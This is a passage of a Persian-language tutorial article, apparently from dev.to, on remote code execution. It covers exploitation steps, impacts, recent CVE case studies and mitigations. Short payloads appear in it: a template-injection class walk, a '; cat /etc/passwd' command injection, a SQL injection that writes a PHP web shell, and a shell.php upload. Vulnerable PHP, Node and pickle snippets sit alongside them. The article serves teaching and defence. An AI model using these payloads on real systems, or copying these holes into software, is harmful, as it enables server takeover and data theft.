\u0642\u0627\u0644\u0628 \u0647\u0627\u06cc \u0628\u062f\u0648\u0646 \u0636\u062f \u0639\u0641\u0648\u0646\u06cc \u062a\u0639\u0628\u06cc\u0647 \u0634\u0648\u062f:<\/p>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight python\"><code><span class=\"n\">template<\/span> <span class=\"o\">=<\/span> <span class=\"nc\">Template<\/span><span class=\"p\">(<\/span><span class=\"n\">user_input<\/span><span class=\"p\">)<\/span>\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<p>\u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u062a\u0632\u0631\u06cc\u0642 \u06a9\u0646\u062f <code>{{config.items()}}<\/code> \u06cc\u0627 \u0628\u062f\u062a\u0631 \u060c <code>{{().__class__.__bases__[0].__subclasses__()}}<\/code>\u0628\u0634\u0631<\/p>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%DA%86%DA%AF%D9%88%D9%86%D9%87_%D9%87%DA%A9%D8%B1%D9%87%D8%A7_%D8%A7%D8%B2_RCE_%D8%A7%D8%B3%D8%AA%D9%81%D8%A7%D8%AF%D9%87_%D9%85%DB%8C_%DA%A9%D9%86%D9%86%D8%AF_%DA%AF%D8%A7%D9%85_%D8%A8%D9%87_%DA%AF%D8%A7%D9%85\"><\/span>\n<p>  <strong>\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f (\u06af\u0627\u0645 \u0628\u0647 \u06af\u0627\u0645)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4ibjxaimf1cer7y57bgm.png\" alt=\"\u0686\u06af\u0648\u0646\u0647 \u0647\u06a9\u0631\u0647\u0627 \u0627\u0632 RCE \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u0646\u062f\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h3><span class=\"ez-toc-section\" id=\"1_%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%DB%8C%DB%8C\"><\/span>\n<p>  <strong>1. \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3><span class=\"ez-toc-section\" id=\"2_%D8%AA%DA%A9%D9%86%DB%8C%DA%A9_%D9%87%D8%A7%DB%8C_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\"><\/span>\n<p>  <strong>2. \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0627\u06cc \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 (PHP)<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nv\">$cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">'cmd'<\/span><span class=\"p\">];<\/span> <span class=\"nb\">system<\/span><span class=\"p\">(<\/span><span class=\"nv\">$cmd<\/span><span class=\"p\">);<\/span> <span class=\"cp\">?&gt;<\/span>\n\/\/ Exploited with: ?cmd=whoami\n<\/span><\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 \u0641\u0631\u0645\u0627\u0646 (node.js)<\/strong>:<\/p>\n<pre class=\"highlight javascript\"><code><span class=\"kd\">const<\/span> <span class=\"p\">{<\/span> <span class=\"nx\">exec<\/span> <span class=\"p\">}<\/span> <span class=\"o\">=<\/span> <span class=\"nf\">require<\/span><span class=\"p\">(<\/span><span class=\"dl\">'<\/span><span class=\"s1\">child_process<\/span><span class=\"dl\">'<\/span><span class=\"p\">);<\/span>\n<span class=\"nf\">exec<\/span><span class=\"p\">(<\/span><span class=\"s2\">`ls -l <\/span><span class=\"p\">${<\/span><span class=\"nx\">userInput<\/span><span class=\"p\">}<\/span><span class=\"s2\">`<\/span><span class=\"p\">,<\/span> <span class=\"p\">...);<\/span>\n<span class=\"c1\">\/\/ ?input=; cat \/etc\/passwd<\/span>\n<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u062a\u0632\u0631\u06cc\u0642 SQL \u0645\u0646\u062a\u0647\u06cc \u0628\u0647 RCE<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?>\n<span class=\"nv\">$query<\/span> <span class=\"o\">=<\/span> <span class=\"s2\">\"SELECT * FROM users WHERE username=\"\"<\/span><span class=\"mf\">.<\/span> <span class=\"nv\">$_GET<\/span><span class=\"p\">[<\/span><span class=\"s1\">\"username'<\/span><span class=\"p\">]<\/span><span class=\"mf\">.<\/span> <span class=\"s2\">\"'\"<\/span><span class=\"p\">;<\/span>\n<span class=\"c1\">\/\/ Payload: ' UNION SELECT \"<?php system($_GET['cmd']);??>\" INTO OUTFILE ...<\/span>\n<span class=\"cp\">?&gt;<\/span>\n<\/span><\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u0646\u0627\u0627\u0645\u0646 \u0634\u062f\u0646 \u0646\u0627\u0627\u0645\u0646 (\u067e\u0627\u06cc\u062a\u0648\u0646 + \u062a\u0631\u0634\u06cc)<\/strong>:<\/p>\n<pre class=\"highlight python\"><code><span class=\"kn\">import<\/span> <span class=\"n\">pickle<\/span>\n<span class=\"n\">user<\/span> <span class=\"o\">=<\/span> <span class=\"n\">pickle<\/span><span class=\"p\">.<\/span><span class=\"nf\">loads<\/span><span class=\"p\">(<\/span><span class=\"n\">base64<\/span><span class=\"p\">.<\/span><span class=\"nf\">b64decode<\/span><span class=\"p\">(<\/span><span class=\"n\">request<\/span><span class=\"p\">.<\/span><span class=\"n\">form<\/span><span class=\"p\">[<\/span><span class=\"sh\">'<\/span><span class=\"s\">payload<\/span><span class=\"sh\">'<\/span><span class=\"p\">]))<\/span>\n<\/code><\/pre>\n<\/li>\n<li>\n<p><strong>\u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/strong>:<\/p>\n<pre class=\"highlight php\"><code><span class=\"cp\"><?php <\/span?> <span class=\"nb\">move_uploaded_file<\/span><span class=\"p\">(<\/span><span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'tmp_name'<\/span><span class=\"p\">],<\/span> <span class=\"s2\">\"uploads\/\"<\/span><span class=\"mf\">.<\/span> <span class=\"nv\">$_FILES<\/span><span class=\"p\">[<\/span><span class=\"s1\">'file'<\/span><span class=\"p\">][<\/span><span class=\"s1\">'name'<\/span><span class=\"p\">]);<\/span> <span class=\"cp\">?&gt;<\/span>\n\/\/ Upload: shell.php with system($_GET['cmd'])\n<\/span><\/code><\/pre>\n<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"3_%D8%AA%D8%AD%D9%88%DB%8C%D9%84_%D8%A8%D8%A7%D8%B1\"><\/span>\n<p>  <strong>3. \u062a\u062d\u0648\u06cc\u0644 \u0628\u0627\u0631<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3><span class=\"ez-toc-section\" id=\"4_%D9%BE%D8%B3_%D8%A7%D8%B2_%D8%A8%D9%87%D8%B1%D9%87_%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C\"><\/span>\n<p>  <strong>4. \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p>\u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0631\u0627 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u06cc\u062f \u060c \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u060c \u062d\u0631\u06a9\u062a \u062c\u0627\u0646\u0628\u06cc \u0631\u0627 \u0646\u0635\u0628 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p>\u0646\u062a\u0627\u06cc\u062c \u0627\u062d\u062a\u0645\u0627\u0644\u06cc: \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u060c \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631 \u060c \u0633\u0631\u0642\u062a \u062f\u0627\u062f\u0647 \u0647\u0627<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h3><span class=\"ez-toc-section\" id=\"%D8%AA%D8%A3%D8%AB%DB%8C%D8%B1_%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%D9%85%D9%88%D9%81%D9%82%DB%8C%D8%AA_%D8%A2%D9%85%DB%8C%D8%B2_RCE\"><\/span>\n<p>  <strong>\u062a\u0623\u062b\u06cc\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a \u0622\u0645\u06cc\u0632 RCE<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p><strong>\u0646\u0642\u0636 \u062f\u0627\u062f\u0647 \u0647\u0627<\/strong>: PII \u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u067e\u0627\u06cc\u06af\u0627\u0647 \u062f\u0627\u062f\u0647 \u060c \u0646\u0634\u062a \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/p>\n<\/li>\n<li>\n<p><strong>\u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0633\u0631\u0648\u0631<\/strong>: \u0628\u062f\u0627\u0641\u0632\u0627\u0631 \u060c \u067e\u0634\u062a\u0648\u0627\u0646\u0647 \u060c \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u062c\u062f\u06cc\u062f \u0631\u0627 \u0646\u0635\u0628 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0633\u062a\u0642\u0631\u0627\u0631 \u0628\u0627\u062c \u0627\u0641\u0632\u0627\u0631<\/strong>: \u067e\u0631\u0648\u0646\u062f\u0647 \u0647\u0627\u06cc \u0631\u0645\u0632\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u060c \u062a\u0642\u0627\u0636\u0627\u06cc \u067e\u0631\u062f\u0627\u062e\u062a<\/p>\n<\/li>\n<li>\n<p><strong>\u0631\u0645\u0632<\/strong>: \u0645\u0639\u062f\u0646 \u0631\u0645\u0632\u0646\u06af\u0627\u0631\u06cc \u067e\u0646\u0647\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u0646\u0627\u0628\u0639 \u0633\u0631\u0648\u0631<\/p>\n<\/li>\n<li>\n<p><strong>\u0627\u0646\u06a9\u0627\u0631 \u062e\u062f\u0645\u0627\u062a<\/strong>: \u0633\u0631\u0648\u0631 \u0631\u0627 \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u06af\u0633\u062a\u0631\u062f\u0647 \u062a\u0631 \u0627\u0633\u0644\u062d\u0647 \u06a9\u0646\u06cc\u062f<\/p>\n<\/li>\n<li>\n<p><strong>\u062e\u0633\u0627\u0631\u062a \u0628\u0647 \u0627\u0639\u062a\u0628\u0627\u0631<\/strong>: \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0632 \u062f\u0633\u062a \u0631\u0641\u062a\u0647 \u060c \u062c\u0631\u06cc\u0645\u0647 \u0647\u0627\u06cc \u0642\u0627\u0646\u0648\u0646\u06cc \u060c \u062e\u0631\u0627\u0628\u06cc \u06af\u0633\u062a\u0631\u062f\u0647<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h3><span class=\"ez-toc-section\" id=\"%D9%85%D8%B7%D8%A7%D9%84%D8%B9%D8%A7%D8%AA_%D9%85%D9%88%D8%B1%D8%AF%DB%8C_RCE_%D8%A8%D8%A7_%D9%85%D8%B4%D8%AE%D8%B5%D8%A7%D8%AA_%D8%A8%D8%A7%D9%84%D8%A7\"><\/span>\n<p>  <strong>\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyl6ck8miryuewpjzuxj.png\" alt=\"\u0645\u0637\u0627\u0644\u0639\u0627\u062a \u0645\u0648\u0631\u062f\u06cc RCE \u0628\u0627 \u0645\u0634\u062e\u0635\u0627\u062a \u0628\u0627\u0644\u0627\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<h4><span class=\"ez-toc-section\" id=\"1_Ivanti_Connect_Secure_%D9%88_Policy_Secure_CVE-2024-21887_CVE-2023-46805\"><\/span>\n<p>  <strong>1. Ivanti Connect Secure \u0648 Policy Secure (CVE-2024-21887 &#038; CVE-2023-46805)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062f\u0631 \u0698\u0627\u0646\u0648\u06cc\u0647 2024<\/p>\n<\/li>\n<li>\n<p>2\u060c000 \u062f\u0633\u062a\u06af\u0627\u0647 VPN \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a<\/p>\n<\/li>\n<li>\n<p>\u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u062d\u062a\u06cc \u067e\u0633 \u0627\u0632 \u062a\u0646\u0638\u06cc\u0645 \u0645\u062c\u062f\u062f \u06a9\u0627\u0631\u062e\u0627\u0646\u0647 \u0647\u0645\u0686\u0646\u0627\u0646 \u0627\u062f\u0627\u0645\u0647 \u062f\u0627\u0634\u062a<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"2_Apache_Struts_2_CVE-2024-53677\"><\/span>\n<p>  <strong>2. Apache Struts 2 (CVE-2024-53677)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0633\u06cc\u0631 \u0645\u0633\u06cc\u0631 \u062f\u0631 \u0645\u0646\u0637\u0642 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u067e\u0631\u0648\u0646\u062f\u0647<\/p>\n<\/li>\n<li>\n<p>\u0633\u06cc\u0633\u062a\u0645 \u0647\u0627\u06cc \u0645\u06cc\u0631\u0627\u062b \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0647\u0646\u0648\u0632 \u062f\u0631 \u062d\u0627\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0633\u062a<\/p>\n<\/li>\n<li>\n<p>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 POC \u0639\u0645\u0648\u0645\u06cc \u062f\u0631 \u0637\u0628\u06cc\u0639\u062a \u0645\u0648\u0631\u062f \u0633\u0648\u0621 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc \u06af\u06cc\u0631\u062f<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"3_PHP_%D8%AF%D8%B1_%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2_CVE-2024-4577\"><\/span>\n<p>  <strong>3. PHP \u062f\u0631 \u0648\u06cc\u0646\u062f\u0648\u0632 (CVE-2024-4577)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u0627\u0632 \u0637\u0631\u06cc\u0642 \u062a\u0632\u0631\u06cc\u0642 \u0627\u0633\u062a\u062f\u0644\u0627\u0644 CGI \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a<\/p>\n<\/li>\n<li>\n<p>\u062a\u0646\u0638\u06cc\u0645\u0627\u062a XAMPP \u062e\u0627\u0635 \u0632\u0628\u0627\u0646 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631<\/p>\n<\/li>\n<li>\n<p>\u0646\u0634\u0627\u0646 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0648\u06cc\u0698\u06af\u06cc \u0647\u0627\u06cc \u0631\u0645\u0632\u06af\u0630\u0627\u0631\u06cc \u0645\u06cc \u062a\u0648\u0627\u0646\u0646\u062f \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0631\u0627 \u0645\u0639\u0631\u0641\u06cc \u06a9\u0646\u0646\u062f<\/p>\n<\/li>\n<\/ul>\n<h4><span class=\"ez-toc-section\" id=\"4_Apache_Tomcat_CVE-2025-24813\"><\/span>\n<p>  <strong>4. Apache Tomcat (CVE-2025-24813)<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<h4><span class=\"ez-toc-section\" id=\"5_%D8%B3%D8%A7%DB%8C%D8%B1_%D8%B3%DB%8C%D8%B3%D8%AA%D9%85_%D8%B9%D8%A7%D9%85%D9%84_%D9%87%D8%A7%DB%8C_%D8%A2%D8%B3%DB%8C%D8%A8_%D9%BE%D8%B0%DB%8C%D8%B1\"><\/span>\n<p>  <strong>5. \u0633\u0627\u06cc\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0639\u0627\u0645\u0644 \u0647\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<ul>\n<li>\n<p>\u062a\u0644\u0627\u0642\u06cc Atlassian \u060c Microsoft SharePoint \u060c Xwiki \u060c Azure Web Apps \u060c Veeam \u0648 Zyxel<\/p>\n<\/li>\n<li>\n<p>\u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0647\u0627 \u0627\u0632 deserialization \u060c \u0645\u0633\u06cc\u0631 \u0639\u0628\u0648\u0631 \u0627\u0632 \u06af\u0630\u0631\u06af\u0627\u0647 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u062a\u063a\u06cc\u0631 \u0627\u0633\u062a<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h2><span class=\"ez-toc-section\" id=\"%D8%A7%D8%B3%D8%AA%D8%B1%D8%A7%D8%AA%DA%98%DB%8C_%D9%87%D8%A7%DB%8C_%DA%A9%D8%A7%D9%87%D8%B4\"><\/span>\n<p>  <strong>\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634<\/strong><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img decoding=\"async\" src=\"https:\/\/media2.dev.to\/dynamic\/image\/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto\/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcramu67wokc4jxjkg04k.png\" alt=\"\u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0647\u0627\u06cc \u06a9\u0627\u0647\u0634\" loading=\"lazy\" width=\"800\" height=\"533\" title=\"\"><\/p>\n<ol>\n<li><strong>\u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0627\u06cc\u0645\u0646<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Sanitize input\n\n- Use parameterized queries\n\n- Avoid `eval()`, `system()` in code\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u067e\u0686 \u0648 \u0628\u0647 \u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Automate patch cycles\n\n- Apply security advisories ASAP\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u0641\u0627\u06cc\u0631\u0648\u0627\u0644 \u0628\u0631\u0646\u0627\u0645\u0647 \u0648\u0628 (WAF)<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Detect common payloads, block them\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u062d\u062f\u0627\u0642\u0644 \u0627\u0635\u0644 \u0627\u0645\u062a\u06cc\u0627\u0632<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Run processes as non-root users\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-off\"><title>\u0627\u0632 \u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u062e\u0627\u0631\u062c \u0634\u0648\u06cc\u062f<\/title>\n    <path d=\"M18 7h4v2h-6V3h2v4zM8 9H2V7h4V3h2v6zm10 8v4h-2v-6h6v2h-4zM8 15v6H6v-4H2v-2h6z\"\/>\n<\/svg><\/p>\n<\/div>\n<\/div>\n<\/div>\n<ol>\n<li><strong>\u0646\u0627\u0627\u0645\u06cc\u062f\u06cc \u0627\u06cc\u0645\u0646<\/strong><\/li>\n<\/ol>\n<div class=\"highlight js-code-highlight\">\n<pre class=\"highlight plaintext\"><code>- Use JSON or integrity-checked formats\n<\/code><\/pre>\n<div class=\"highlight__panel js-actions-panel\">\n<div class=\"highlight__panel-action js-fullscreen-code-action\">\n    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" class=\"highlight-action crayons-icon highlight-action--fullscreen-on\"><title>\u062d\u0627\u0644\u062a \u062a\u0645\u0627\u0645 \u0635\u0641\u062d\u0647 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f<\/title>\n    <path d=\"M16 3h6v6h-2V5h-4V3zM2 3h6v2H4v4H2V3zm18 16v-4h2v6h-6v-2h4zM4 19h4v2H2v-6h2v4z\"\/>\n<\/svg><\/p>\n<p>    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"20px\" height=\"20px\" viewbox=\"0 0 24 24\" 